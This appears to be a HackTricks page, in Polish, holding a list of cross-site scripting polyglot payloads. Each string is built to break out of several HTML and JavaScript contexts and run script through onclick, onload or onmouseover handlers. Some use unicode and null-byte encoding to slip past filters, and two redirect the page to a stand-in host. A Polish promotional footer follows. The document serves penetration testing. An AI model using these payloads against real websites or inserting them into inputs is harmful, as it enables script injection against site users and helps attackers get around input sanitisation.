javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.